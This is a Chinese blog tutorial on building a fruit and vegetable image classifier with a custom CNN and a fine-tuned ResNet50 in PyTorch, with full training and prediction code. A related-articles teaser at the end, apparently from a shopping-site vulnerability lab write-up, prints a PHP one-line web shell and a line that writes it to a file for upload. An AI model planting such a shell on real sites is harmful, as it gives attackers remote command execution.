基于卷积神经网络(CNN)和ResNet50的水果与蔬菜图像分类系统

server/2024/12/27 23:00:32/

前言

在现代智能生活中,计算机视觉技术已经成为不可或缺的工具,特别是在食物识别领域。想象一下,您只需拍摄一张水果或蔬菜的照片,系统就能自动识别其种类并为您提供丰富的食谱建议。这项技术不仅在日常生活中极具实用性,在农业、食品配送及健康监测等多个行业中也有着广泛的应用。

本文展示了一个基于深度学习的水果与蔬菜分类系统,采用了强大的卷积神经网络(CNN)和先进的数据增强技术,能够在各种复杂环境下准确识别出不同的水果和蔬菜种类。通过使用预训练的ResNet50模型和混合精度训练,系统优化了训练过程的效率和准确度,并且引入了OneCycleLR学习率调度策略,以确保最佳的学习速度。

无论是在个人项目、商业应用,还是在未来的食品识别系统中,本项目都能为您提供强有力的技术支持。通过本代码,您将能够实现从数据加载、模型训练到最终预测的完整流程,轻松将深度学习应用到食品识别的各个方面。

让我们一起探索这个强大的工具,如何帮助我们实现更智能的生活!

概述

本项目实现了一个基于深度学习的水果和蔬菜识别系统,旨在通过计算机视觉技术对图像中的食品进行分类。系统的核心基于卷积神经网络(CNN)架构,结合了数据增强技术、预训练模型、混合精度训练和学习率调度等先进策略,以提高训练效率和分类准确度。

主要功能:

  1. 数据预处理与增强:使用图像预处理技术(如调整大小、随机旋转、颜色调整等)对输入数据进行增强,提高模型的鲁棒性和泛化能力。
  2. 自定义数据集:通过FruitVegDataset类构建自定义数据集,支持从指定路径加载和标记图像,并能够方便地应用图像转换。
  3. 深度学习模型:利用卷积神经网络(CNN)进行特征提取,并通过ResNet50预训练模型提升识别能力。该模型经过优化,具有较强的表现力,能够识别多达36类水果和蔬菜。
  4. 训练与验证:通过使用AdamW优化器、交叉熵损失函数以及OneCycleLR学习率调度器,优化了训练过程。采用了混合精度训练(Mixed Precision Training)以加速训练过程,同时减少显存使用。
  5. 预测与应用:训练好的模型可用于实时图像预测,用户只需上传一张水果或蔬菜的图片,系统即可返回预测结果,并展示分类的概率信息。

系统特点:

  • 高效训练:通过学习率调度和优化器调整,训练过程不仅更加高效,还能提升模型在验证集上的准确度。
  • 增强现实应用:该模型能够应用于餐厅菜单识别、农业监测、食品配送、健康管理等实际场景,具有较高的商业和应用价值。
  • 简易部署:训练后的模型可以轻松部署到各类应用中,包括移动端应用或web端服务,使得实时食品识别变得更加便捷。

本项目展示了如何通过深度学习技术实现水果和蔬菜的自动分类,推动了食品识别领域的进一步发展,同时为智能农业、健康饮食等领域提供了有力的技术支持。

ResNet50模型介绍

ResNet50 是一种深度残差网络(Residual Network),由微软研究院的何恺明等人于2015年提出。它是ResNet系列中的一个重要变体,具有50层深度,广泛用于计算机视觉任务,如图像分类、目标检测和语义分割。ResNet50的核心思想是引入残差连接(Residual Connections),即通过跳跃连接(skip connections)直接将输入添加到输出,从而解决深层网络中的梯度消失和梯度爆炸问题,促进更深层次网络的训练。

ResNet50的特点
  1. 残差连接(Residual Connections)

    • 传统的深层网络容易出现梯度消失或梯度爆炸的问题,使得训练变得困难。ResNet通过引入残差连接,将输入数据直接跳跃到输出端,形成“捷径”(shortcut)。这使得网络能够更容易地学习到残差(输入和输出的差值),而非直接学习整个映射函数。
    • 这种设计可以有效避免深层网络中的退化问题,提升网络的训练效率和性能。
  2. 深度网络结构

    • ResNet50的深度为50层,采用了多个卷积层(Convolutional Layers)批量归一化层(Batch Normalization),通过堆叠的方式构成深层的神经网络。每一层的输出与输入之间通过跳跃连接直接相加,简化了网络的训练过程。
    • ResNet50相比于其它较浅的网络(如ResNet18、ResNet34)提供了更多的学习能力,能够学习到更复杂的特征。
  3. 残差模块(Residual Block)

    • 在ResNet50中,残差模块是由多个卷积层和残差连接组成的。通常,一个残差模块包括两到三层卷积,每层后跟一个批量归一化层和ReLU激活函数。
    • 每个模块通过1x1卷积(通常用于减少或恢复通道数)与输入建立直接的跳跃连接,最终将输入和输出相加。
    • 通过残差模块,ResNet能够在避免过拟合的情况下训练非常深的网络,并保持较高的准确率。
  4. 瓶颈结构(Bottleneck Architecture)

    • ResNet50采用了瓶颈结构,即每个残差块包含三个卷积层:一个1x1卷积层(用于降低维度),一个3x3卷积层(用于特征提取),以及一个1x1卷积层(用于恢复维度)。
    • 这种结构有效减少了计算量,并且提高了网络的效率。相比于普通的卷积层,瓶颈结构大大减少了参数数量和计算量,使得网络能够在有限的硬件资源上运行得更加高效。
  5. 跳跃连接的应用

    • ResNet50的最大创新之一就是其跳跃连接,它允许信号在网络中传递得更远。每个跳跃连接将前一层的输出与当前层的输出相加,生成最终的输出,这样有助于更容易地训练更深的网络,减少了网络中的退化问题。
    • 通过这种方式,网络不仅可以学习到更复杂的特征,还能够避免梯度在反向传播中的衰减。
  6. 预训练和迁移学习

    • ResNet50常常用作预训练模型,尤其在迁移学习中非常流行。通过在大规模数据集(如ImageNet)上进行预训练,ResNet50能够学习到通用的图像特征,这些特征可以迁移到其他特定的任务上,从而提高目标任务的性能。
    • 由于其出色的特征提取能力,ResNet50作为特征提取器在许多计算机视觉任务中表现出色,并且能够显著减少训练时间。
  7. 较低的计算成本

    • ResNet50相较于更深的网络(如ResNet101、ResNet152)在保持高性能的同时,计算成本相对较低。50层深度的网络结构相较于更深的变体,参数和计算量适中,适合于资源受限的环境。
ResNet50的应用
  • 图像分类:ResNet50被广泛用于图像分类任务,特别是在ImageNet等大规模数据集上训练后,能够为图像提供强大的特征表示。它在ImageNet挑战赛中表现出色,取得了很高的准确率。
  • 目标检测与语义分割:通过结合其它架构(如Faster R-CNN、Mask R-CNN),ResNet50也常用于目标检测和语义分割任务,提取高质量的特征来帮助检测和分割任务。
  • 迁移学习:由于其优异的特征提取能力,ResNet50常作为迁移学习模型的基础,能够应用于医疗图像分析、面部识别、视频分析等领域。
    在这里插入图片描述

模型的核心逻辑

本项目采用了基于深度学习的卷积神经网络(CNN)来进行水果与蔬菜分类任务。具体的核心逻辑包括以下几个部分:

1. 使用预训练模型作为特征提取器

核心的模型结构基于ResNet50,该模型在ImageNet上预训练过,已经学到了有效的图像特征。因此,在我们的任务中,ResNet50能够有效地提取水果和蔬菜图像中的低层次和高层次特征。

  • 冻结部分层:为了减少计算量,并且避免在较少的数据集上过拟合,我们选择冻结ResNet50模型的前30层(即不更新这些层的权重)。这使得模型能够专注于学习更高层次的特征,而不需要重新学习基础的图像特征。
self.backbone = torch.hub.load('pytorch/vision:v0.10.0', 'resnet50', pretrained=True)  
for param in list(self.backbone.parameters())[:-30]:  param.requires_grad = False  
  • 替换全连接层:ResNet50的原始全连接层被替换成自定义的全连接层,这一层是针对水果和蔬菜分类任务进行设计的。通过新的全连接层将提取到的特征映射到目标类别(水果与蔬菜类别)。
self.backbone.fc = nn.Sequential(  nn.Linear(num_features, 1024),  nn.BatchNorm1d(1024),  nn.ReLU(inplace=True),  nn.Dropout(0.3),  nn.Linear(1024, 512),  nn.BatchNorm1d(512),  nn.ReLU(inplace=True),  nn.Dropout(0.3),  nn.Linear(512, num_classes)  
)  
2. 数据增强与预处理

为了增加训练数据的多样性,减少模型的过拟合,输入图像经过了一系列的数据增强操作。这些操作包括:

  • 缩放、裁剪:通过随机缩放、随机裁剪等操作确保模型能够应对不同尺度的图像。
  • 旋转与翻转:通过随机旋转、水平和垂直翻转等,增强模型的鲁棒性。
  • 颜色抖动:对图像的亮度、对比度、饱和度等进行随机变化,以增加模型对颜色变化的适应性。

这些数据增强方法提高了模型在未见数据上的泛化能力。

train_transform = transforms.Compose([  transforms.Resize((256, 256)),  transforms.RandomResizedCrop(224, scale=(0.8, 1.0)),  transforms.RandomHorizontalFlip(),  transforms.RandomVerticalFlip(),  transforms.RandomRotation(20),  transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.1),  transforms.ToTensor(),  transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])  
])  
3. 模型训练与优化

训练过程中,使用了以下几个重要的技术:

  • OneCycleLR学习率调度器:为了加速训练过程并避免过拟合,使用了OneCycleLR学习率调度器,它帮助在训练初期增加学习率,然后逐渐减小,以使模型收敛得更快并且避免在训练结束时陷入局部最优解。
scheduler = OneCycleLR(  optimizer,  max_lr=config.learning_rate,  epochs=config.epochs,  steps_per_epoch=len(train_loader),  pct_start=0.1,  anneal_strategy='cos'  
)  
  • 优化器:使用了AdamW优化器,它是一种基于自适应估计的优化方法,适合深度学习任务。通过AdamW优化器,我们能够有效地更新模型参数。

  • 混合精度训练:为了提高训练效率和减少显存占用,使用了PyTorch的混合精度训练(autocastGradScaler)。这使得在计算过程中部分操作使用半精度浮点数(FP16),以提高速度和节省内存,同时保持较高的精度。

with autocast():  outputs = model(inputs)  loss = criterion(outputs, labels)  
4. 损失函数与评估
  • 损失函数:使用了交叉熵损失(Cross-Entropy Loss)作为训练的目标函数,因为它适用于多类别分类任务。模型通过最小化交叉熵损失来优化其分类精度。
criterion = nn.CrossEntropyLoss()  
  • 评估指标:除了损失函数,训练过程中还监控了准确率(Accuracy),即模型在给定的测试集上的分类正确率。通过准确率来评估模型的性能,并在训练过程中选择最优的模型。
5. 模型预测与推断

训练完成后,模型可以用于对新的图像进行预测。输入图像首先经过相同的数据预处理和增强(例如调整大小、规范化等),然后输入到训练好的模型中,得到模型的预测输出。

模型输出的结果通过softmax函数转化为每个类别的概率值,最终返回最可能的类别及其对应的概率。

def predict_image(url, model):  response = requests.get(url)  image = Image.open(BytesIO(response.content)).convert('RGB')  input_tensor = transform(image).unsqueeze(0)  with torch.no_grad():  output = model(input_tensor)  probabilities = torch.nn.functional.softmax(output[0], dim=0)  predicted_class = torch.argmax(probabilities).item()  return predicted_class, probabilities[predicted_class].item()  

代码实现

1. 设置随机种子和设备

为了保证结果的可重复性,我们设置了随机种子。然后确定是否使用GPU,如果GPU可用,则使用GPU,否则使用CPU。

!pip install ultralytics -i  https://mirrors.aliyun.com/pypi/simple/ numpy
!pip install albumentations -i  https://mirrors.aliyun.com/pypi/simple/ numpy
!pip install timm -i  https://mirrors.aliyun.com/pypi/simple/ numpy
!pip install wandb -i  https://mirrors.aliyun.com/pypi/simple/ numpy
import os
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from tqdm import tqdm
import random# Set seeds for reproducibility
def set_seed(seed=42):torch.manual_seed(seed)torch.cuda.manual_seed_all(seed)np.random.seed(seed)random.seed(seed)torch.backends.cudnn.deterministic = Truetorch.backends.cudnn.benchmark = Falseset_seed()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print(f"Using device: {device}")# Create folder for saving results
os.makedirs('results', exist_ok=True)
2. 数据集展示

这一部分的代码用来展示数据集的结构,打印数据集的类和图像数量,并随机展示一些训练集的图像。

def explore_data(data_path):"""Explore and visualize the dataset"""print("\nExploring Dataset Structure:")print("-" * 50)splits = ['train', 'validation', 'test']for split in splits:split_path = os.path.join(data_path, split)if os.path.exists(split_path):classes = sorted(os.listdir(split_path))total_images = sum(len(os.listdir(os.path.join(split_path, cls))) for cls in classes)print(f"\n{split.capitalize()} Set:")print(f"Number of classes: {len(classes)}")print(f"Total images: {total_images}")print(f"Example classes: {', '.join(classes[:5])}...")# Visualize sample imagesprint("\nVisualizing Sample Images...")train_path = os.path.join(data_path, 'train')classes = sorted(os.listdir(train_path))plt.figure(figsize=(15, 10))for i in range(9):class_name = random.choice(classes)class_path = os.path.join(train_path, class_name)img_name = random.choice(os.listdir(class_path))img_path = os.path.join(class_path, img_name)img = Image.open(img_path)plt.subplot(3, 3, i+1)plt.imshow(img)plt.title(f'Class: {class_name}')plt.axis('off')plt.tight_layout()plt.savefig('results/sample_images.png')plt.show()# Explore dataset
data_path = "/home/mw/input/Fruit1112533/Fruits and Vegetables Image Recognition Dataset"
explore_data(data_path)

在这里插入图片描述
在这里插入图片描述

3. 自定义数据集类

这部分代码定义了一个自定义的PyTorch Dataset 类,FruitVegDataset,用于加载数据集,并支持图像的转换(如缩放、裁剪等)。

class FruitVegDataset(Dataset):def __init__(self, root_dir, split='train', transform=None):self.root_dir = os.path.join(root_dir, split)self.transform = transformself.classes = sorted(os.listdir(self.root_dir))self.class_to_idx = {cls_name: i for i, cls_name in enumerate(self.classes)}self.images = []self.labels = []for class_name in self.classes:class_path = os.path.join(self.root_dir, class_name)for img_name in os.listdir(class_path):if img_name.lower().endswith(('.png', '.jpg', '.jpeg')):self.images.append(os.path.join(class_path, img_name))self.labels.append(self.class_to_idx[class_name])def __len__(self):return len(self.images)def __getitem__(self, idx):img_path = self.images[idx]label = self.labels[idx]image = Image.open(img_path).convert('RGB')if self.transform:image = self.transform(image)return image, label
4. 数据增强和预处理

这里定义了数据增强和预处理流程。使用了常见的数据增强方法,如随机水平翻转、随机旋转、颜色抖动等。并且对图像进行标准化处理。

# Define transforms
train_transform = transforms.Compose([transforms.Resize((224, 224)),transforms.RandomHorizontalFlip(),transforms.RandomRotation(15),transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])val_transform = transforms.Compose([transforms.Resize((224, 224)),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])# Visualize augmentations
def show_augmentations(dataset, num_augments=5):"""Show original image and its augmented versions"""idx = random.randint(0, len(dataset)-1)img_path = dataset.images[idx]original_img = Image.open(img_path).convert('RGB')plt.figure(figsize=(15, 5))# Show originalplt.subplot(1, num_augments+1, 1)plt.imshow(original_img)plt.title('Original')plt.axis('off')# Show augmented versionsfor i in range(num_augments):augmented = train_transform(original_img)augmented = augmented.permute(1, 2, 0).numpy()augmented = (augmented * [0.229, 0.224, 0.225] + [0.485, 0.456, 0.406])augmented = np.clip(augmented, 0, 1)plt.subplot(1, num_augments+1, i+2)plt.imshow(augmented)plt.title(f'Augmented {i+1}')plt.axis('off')plt.tight_layout()plt.savefig('results/augmentations.png')plt.show()# Create datasets and show augmentations
train_dataset = FruitVegDataset(data_path, 'train', train_transform)
show_augmentations(train_dataset)

在这里插入图片描述

5. 卷积块和网络结构

这一部分代码定义了一个卷积块(ConvBlock)和一个自定义的卷积神经网络(FruitVegCNN)用于图像分类

class ConvBlock(nn.Module):def __init__(self, in_channels, out_channels):super().__init__()self.conv = nn.Sequential(nn.Conv2d(in_channels, out_channels, 3, padding=1),nn.BatchNorm2d(out_channels),nn.ReLU(inplace=True),nn.Conv2d(out_channels, out_channels, 3, padding=1),nn.BatchNorm2d(out_channels),nn.ReLU(inplace=True),nn.MaxPool2d(2))def forward(self, x):return self.conv(x)class FruitVegCNN(nn.Module):def __init__(self, num_classes):super().__init__()self.features = nn.Sequential(ConvBlock(3, 64),ConvBlock(64, 128),ConvBlock(128, 256),ConvBlock(256, 512),ConvBlock(512, 512))self.classifier = nn.Sequential(nn.AdaptiveAvgPool2d(1),nn.Flatten(),nn.Dropout(0.5),nn.Linear(512, 256),nn.ReLU(inplace=True),nn.Dropout(0.5),nn.Linear(256, num_classes))def forward(self, x):x = self.features(x)x = self.classifier(x)return x# Function to visualize feature maps
def visualize_feature_maps(model, sample_image):"""Visualize feature maps after each conv block"""model.eval()# Get feature maps after each conv blockfeature_maps = []x = sample_image.unsqueeze(0).to(device)for block in model.features:x = block(x)feature_maps.append(x.detach().cpu())# Plot feature mapsplt.figure(figsize=(15, 10))for i, fmap in enumerate(feature_maps):# Plot first 6 channels of each blockfmap = fmap[0][:6].permute(1, 2, 0)fmap = (fmap - fmap.min()) / (fmap.max() - fmap.min())for j in range(min(6, fmap.shape[-1])):plt.subplot(5, 6, i*6 + j + 1)plt.imshow(fmap[:, :, j], cmap='viridis')plt.title(f'Block {i+1}, Ch {j+1}')plt.axis('off')plt.tight_layout()plt.savefig('results/feature_maps.png')plt.show()# Initialize model and visualize feature maps
model = FruitVegCNN(num_classes=len(train_dataset.classes)).to(device)
sample_image, _ = train_dataset[0]
visualize_feature_maps(model, sample_image)

在这里插入图片描述

6. 训练和验证函数

定义了训练(train_one_epoch)和验证(validate)函数。这些函数在每个epoch中更新模型权重,并计算损失和准确率。

def train_one_epoch(model, train_loader, criterion, optimizer, device):model.train()running_loss = 0.0correct = 0total = 0pbar = tqdm(train_loader, desc='Training')for inputs, labels in pbar:inputs, labels = inputs.to(device), labels.to(device)optimizer.zero_grad()outputs = model(inputs)loss = criterion(outputs, labels)loss.backward()optimizer.step()running_loss += loss.item()_, predicted = outputs.max(1)total += labels.size(0)correct += predicted.eq(labels).sum().item()pbar.set_postfix({'loss': f'{loss.item():.4f}','acc': f'{100.*correct/total:.2f}%'})return running_loss / len(train_loader), 100. * correct / totaldef validate(model, val_loader, criterion, device):model.eval()running_loss = 0.0correct = 0total = 0with torch.no_grad():for inputs, labels in tqdm(val_loader, desc='Validation'):inputs, labels = inputs.to(device), labels.to(device)outputs = model(inputs)loss = criterion(outputs, labels)running_loss += loss.item()_, predicted = outputs.max(1)total += labels.size(0)correct += predicted.eq(labels).sum().item()return running_loss / len(val_loader), 100. * correct / totaldef plot_training_progress(history):"""Plot and save training progress"""plt.figure(figsize=(12, 4))plt.subplot(1, 2, 1)plt.plot(history['train_loss'], label='Train Loss')plt.plot(history['val_loss'], label='Val Loss')plt.title('Loss History')plt.xlabel('Epoch')plt.ylabel('Loss')plt.legend()plt.subplot(1, 2, 2)plt.plot(history['train_acc'], label='Train Acc')plt.plot(history['val_acc'], label='Val Acc')plt.title('Accuracy History')plt.xlabel('Epoch')plt.ylabel('Accuracy (%)')plt.legend()plt.tight_layout()plt.savefig('results/training_progress.png')plt.show()
7. 训练与验证过程

在此部分代码中,我们定义了训练和验证的数据加载器,并设置了模型训练的相关配置。使用CrossEntropyLoss作为损失函数,AdamW优化器来优化模型,同时设置了学习率调度器ReduceLROnPlateau以自动调整学习率。训练过程包括多轮的训练与验证,并在每个周期结束时记录和打印训练与验证的损失和准确率。此外,还会保存每个周期的模型权重并在验证准确率提高时保存最佳模型。

# Create data loaders
train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True, num_workers=2)
val_dataset = FruitVegDataset(data_path, 'validation', val_transform)
val_loader = DataLoader(val_dataset, batch_size=32, shuffle=False, num_workers=2)# Training setup
criterion = nn.CrossEntropyLoss()
optimizer = optim.AdamW(model.parameters(), lr=0.001, weight_decay=0.01)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=3, verbose=True)# Training loop
num_epochs = 30
best_val_acc = 0
history = {'train_loss': [], 'train_acc': [],'val_loss': [], 'val_acc': []
}print("\nStarting training...")
for epoch in range(num_epochs):print(f'\nEpoch {epoch+1}/{num_epochs}')train_loss, train_acc = train_one_epoch(model, train_loader, criterion, optimizer, device)val_loss, val_acc = validate(model, val_loader, criterion, device)# Update schedulerscheduler.step(val_loss)# Save historyhistory['train_loss'].append(train_loss)history['train_acc'].append(train_acc)history['val_loss'].append(val_loss)history['val_acc'].append(val_acc)print(f'Train Loss: {train_loss:.4f} | Train Acc: {train_acc:.2f}%')print(f'Val Loss: {val_loss:.4f} | Val Acc: {val_acc:.2f}%')# Plot progressif (epoch + 1) % 5 == 0:plot_training_progress(history)# Save best modelif val_acc > best_val_acc:best_val_acc = val_accprint(f'New best validation accuracy: {best_val_acc:.2f}%')torch.save({'epoch': epoch,'model_state_dict': model.state_dict(),'optimizer_state_dict': optimizer.state_dict(),'best_acc': best_val_acc,}, 'results/best_model.pth')# Final training visualization
plot_training_progress(history)

在这里插入图片描述
在这里插入图片描述

8. 绘制训练与验证的准确率与损失曲线

此部分代码用于可视化训练过程中模型的准确率和损失变化情况。通过绘制训练和验证集上的准确率与损失曲线,帮助我们直观地观察模型在不同训练周期中的表现。同时,代码会输出训练和验证过程中达到的最佳准确率,以便进一步分析模型的性能。

import matplotlib.pyplot as pltdef plot_accuracy_loss(history):"""Plot training and validation accuracy/loss curves"""plt.figure(figsize=(12, 4))# Plot Accuracyplt.subplot(1, 2, 1)plt.plot(history['train_acc'], label='Training', marker='o')plt.plot(history['val_acc'], label='Validation', marker='o')plt.title('Model Accuracy')plt.xlabel('Epoch')plt.ylabel('Accuracy (%)')plt.legend()plt.grid(True)# Plot Lossplt.subplot(1, 2, 2)plt.plot(history['train_loss'], label='Training', marker='o')plt.plot(history['val_loss'], label='Validation', marker='o')plt.title('Model Loss')plt.xlabel('Epoch')plt.ylabel('Loss')plt.legend()plt.grid(True)plt.tight_layout()plt.savefig('results/accuracy_loss_curves.png')plt.show()# Print best accuracy valuesbest_train_acc = max(history['train_acc'])best_val_acc = max(history['val_acc'])print(f"\nBest Training Accuracy: {best_train_acc:.2f}%")print(f"Best Validation Accuracy: {best_val_acc:.2f}%")# Plot the curves
plot_accuracy_loss(history)

在这里插入图片描述

9. 优化的训练配置与增强数据增强

此部分代码实现了一个优化的训练流程,主要包括改进的超参数配置、增强的数据预处理以及混合精度训练技术。通过使用 ResNet50 作为骨干网络,添加了逐层冻结策略、增强的分类器结构(带有Dropout和Batch Normalization)以及One Cycle Learning Rate调度器等技术,可以提升模型的训练效果和泛化能力。此外,训练过程中应用了混合精度训练来加速计算并减少显存占用,进一步优化了训练过程。

import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim.lr_scheduler import OneCycleLR
from torch.cuda.amp import autocast, GradScaler# Improved training configurations
class OptimizedConfig:def __init__(self):self.image_size = 256  # Increased from 224self.batch_size = 16   # Smaller batch size for better generalizationself.learning_rate = 3e-4self.weight_decay = 0.01self.epochs = 50self.dropout = 0.3# Enhanced data augmentation
train_transform = transforms.Compose([transforms.Resize((256, 256)),transforms.RandomResizedCrop(224, scale=(0.8, 1.0)),transforms.RandomHorizontalFlip(),transforms.RandomVerticalFlip(),transforms.RandomRotation(20),transforms.RandomAffine(degrees=0, translate=(0.1, 0.1), scale=(0.9, 1.1)),transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.1),transforms.RandomApply([transforms.GaussianBlur(3)], p=0.3),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])# Optimized model architecture
class OptimizedCNN(nn.Module):def __init__(self, num_classes):super().__init__()# Use pretrained ResNet50 as backboneself.backbone = torch.hub.load('pytorch/vision:v0.10.0', 'resnet50', pretrained=True)# Freeze early layersfor param in list(self.backbone.parameters())[:-30]:param.requires_grad = False# Modified classifiernum_features = self.backbone.fc.in_featuresself.backbone.fc = nn.Sequential(nn.Linear(num_features, 1024),nn.BatchNorm1d(1024),nn.ReLU(inplace=True),nn.Dropout(0.3),nn.Linear(1024, 512),nn.BatchNorm1d(512),nn.ReLU(inplace=True),nn.Dropout(0.3),nn.Linear(512, num_classes))def forward(self, x):return self.backbone(x)# Optimized training function
def train_with_optimization(model, train_loader, val_loader, config):criterion = nn.CrossEntropyLoss(label_smoothing=0.1)optimizer = optim.AdamW(model.parameters(), lr=config.learning_rate, weight_decay=config.weight_decay)# One Cycle Learning Rate Schedulerscheduler = OneCycleLR(optimizer,max_lr=config.learning_rate,epochs=config.epochs,steps_per_epoch=len(train_loader),pct_start=0.1,anneal_strategy='cos')# Gradient Scaler for mixed precision trainingscaler = GradScaler()history = {'train_loss': [], 'train_acc': [],'val_loss': [], 'val_acc': []}best_val_acc = 0for epoch in range(config.epochs):# Trainingmodel.train()train_loss = 0correct = 0total = 0pbar = tqdm(train_loader, desc=f'Epoch {epoch+1}/{config.epochs}')for inputs, labels in pbar:inputs, labels = inputs.to(device), labels.to(device)optimizer.zero_grad()# Mixed precision trainingwith autocast():outputs = model(inputs)loss = criterion(outputs, labels)scaler.scale(loss).backward()scaler.step(optimizer)scaler.update()scheduler.step()train_loss += loss.item()_, predicted = outputs.max(1)total += labels.size(0)correct += predicted.eq(labels).sum().item()pbar.set_postfix({'loss': f'{loss.item():.4f}','acc': f'{100.*correct/total:.2f}%','lr': f'{scheduler.get_last_lr()[0]:.6f}'})train_acc = 100. * correct / totaltrain_loss = train_loss / len(train_loader)# Validationmodel.eval()val_loss = 0correct = 0total = 0with torch.no_grad():for inputs, labels in tqdm(val_loader, desc='Validation'):inputs, labels = inputs.to(device), labels.to(device)outputs = model(inputs)loss = criterion(outputs, labels)val_loss += loss.item()_, predicted = outputs.max(1)total += labels.size(0)correct += predicted.eq(labels).sum().item()val_acc = 100. * correct / totalval_loss = val_loss / len(val_loader)# Save historyhistory['train_loss'].append(train_loss)history['train_acc'].append(train_acc)history['val_loss'].append(val_loss)history['val_acc'].append(val_acc)print(f'\nEpoch {epoch+1}/{config.epochs}:')print(f'Train Loss: {train_loss:.4f} | Train Acc: {train_acc:.2f}%')print(f'Val Loss: {val_loss:.4f} | Val Acc: {val_acc:.2f}%')# Save best modelif val_acc > best_val_acc:best_val_acc = val_acctorch.save({'epoch': epoch,'model_state_dict': model.state_dict(),'optimizer_state_dict': optimizer.state_dict(),'best_acc': best_val_acc,}, 'optimized_model.pth')print(f'New best validation accuracy: {best_val_acc:.2f}%')return history# Create dataloaders with optimized configuration
config = OptimizedConfig()
train_dataset = FruitVegDataset(data_path, 'train', train_transform)
val_dataset = FruitVegDataset(data_path, 'validation', val_transform)train_loader = DataLoader(train_dataset, batch_size=config.batch_size,shuffle=True,num_workers=4,pin_memory=True)
val_loader = DataLoader(val_dataset,batch_size=config.batch_size,shuffle=False,num_workers=4,pin_memory=True)# Initialize and train optimized model
model = OptimizedCNN(num_classes=len(train_dataset.classes)).to(device)
history = train_with_optimization(model, train_loader, val_loader, config)
10. 优化结果的可视化

此部分代码负责可视化优化后的训练和验证过程中的准确率与损失值。通过图表展示模型在训练和验证集上的表现,帮助评估优化策略的有效性。代码还输出了最佳的训练和验证准确率,便于进一步分析模型的性能。

def plot_optimized_results(history):plt.style.use('seaborn-v0_8')plt.figure(figsize=(15, 5))# Plot Accuracyplt.subplot(1, 2, 1)plt.plot(history['train_acc'], label='Training', marker='o')plt.plot(history['val_acc'], label='Validation', marker='o')plt.title('Model Accuracy with Optimizations')plt.xlabel('Epoch')plt.ylabel('Accuracy (%)')plt.legend()plt.grid(True)# Plot Lossplt.subplot(1, 2, 2)plt.plot(history['train_loss'], label='Training', marker='o')plt.plot(history['val_loss'], label='Validation', marker='o')plt.title('Model Loss with Optimizations')plt.xlabel('Epoch')plt.ylabel('Loss')plt.legend()plt.grid(True)plt.tight_layout()plt.savefig('optimized_results.png', dpi=300, bbox_inches='tight')plt.show()# Print best metricsbest_train_acc = max(history['train_acc'])best_val_acc = max(history['val_acc'])print(f"\nBest Training Accuracy: {best_train_acc:.2f}%")print(f"Best Validation Accuracy: {best_val_acc:.2f}%")# Plot results
plot_optimized_results(history)

在这里插入图片描述

11. 模型加载与图像预测

这段代码提供了一个从URL加载图像并用训练好的模型进行预测的流程。首先,加载已保存的模型,并通过预处理步骤对图像进行转换,然后进行推理并展示前5个预测结果。

import torch
import torchvision.transforms as transforms
from PIL import Image
import matplotlib.pyplot as plt
import requests
from io import BytesIO# Load the saved model
def load_model():# Check if model file existstry:# Load model checkpointcheckpoint = torch.load('optimized_model.pth')model = OptimizedCNN(num_classes=36)  # Same as trainingmodel.load_state_dict(checkpoint['model_state_dict'])model.eval()print("Model loaded successfully!")return modelexcept FileNotFoundError:print("Model file 'optimized_model.pth' not found!")return None# Prediction function
def predict_image(url, model):# Image preprocessingtransform = transforms.Compose([transforms.Resize((256, 256)),transforms.CenterCrop(224),transforms.ToTensor(),transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])# Load image from URLresponse = requests.get(url)image = Image.open(BytesIO(response.content)).convert('RGB')# Transform imageinput_tensor = transform(image).unsqueeze(0)# Make predictionwith torch.no_grad():output = model(input_tensor)probabilities = torch.nn.functional.softmax(output[0], dim=0)# Get top 5 predictionstop_probs, top_indices = torch.topk(probabilities, 5)# Show resultsplt.figure(figsize=(12, 4))# Show imageplt.subplot(1, 2, 1)plt.imshow(image)plt.title('Input Image')plt.axis('off')# Show predictionsplt.subplot(1, 2, 2)classes = sorted(os.listdir("/home/mw/input/Fruit1112533/Fruits and Vegetables Image Recognition Dataset/train"))y_pos = range(5)plt.barh(y_pos, [prob.item() * 100 for prob in top_probs])plt.yticks(y_pos, [classes[idx] for idx in top_indices])plt.xlabel('Probability (%)')plt.title('Top 5 Predictions')plt.tight_layout()plt.show()# Print predictionsprint("\nPredictions:")print("-" * 30)for i in range(5):print(f"{classes[top_indices[i]]:20s}: {top_probs[i]*100:.2f}%")# Load model
model = load_model()# Now you can use it like this:
predict_image('https://pngimg.com/uploads/watermelon/watermelon_PNG2640.png', model)

在这里插入图片描述

注意

# 需要完整代码以及数据集请点击以下链接:
https://mbd.pub/o/bread/mbd-Z5yclpZu

http://www.ppmy.cn/server/153750.html

相关文章

niushop开源商城靶场漏洞

文件上传漏洞 先注册一个账号 来到个人信息修改个人头像 选择我们的马 #一句话(不想麻烦的选择一句话也可以) <?php eval($_POST["cmd"]);?> #生成h.php文件 <?php fputs(fopen(h.php,w),<?php eval($_POST["cmd"]);?>); ?> 在…

Bogus:.NET的假数据生成利器

我们在项目开发中&#xff0c;为了保证系统功能完整、准确性&#xff0c;我们都需要模拟真实数据进行测试。 今天推荐一个开源库&#xff0c;方便我们制造假数据测试。 01 项目简介 Bogus 是一个开源的 .NET 库&#xff0c;它提供了一个强大的工具集&#xff0c;用于生成虚假…

Windows系统上配置eNSP环境的详细步骤

华为eNSP&#xff08;Enterprise Network Simulation Platform&#xff09;是一款针对华为数通网络设备的网络仿真平台&#xff0c;用于辅助工程师进行网络技术学习、方案验证和故障排查等工作。以下是在Windows系统上配置eNSP环境的详细步骤&#xff1a; 1. 准备工作 下载安…

Java反射学习(4)(“反射“机制获取成员方法及详细信息(Method类))

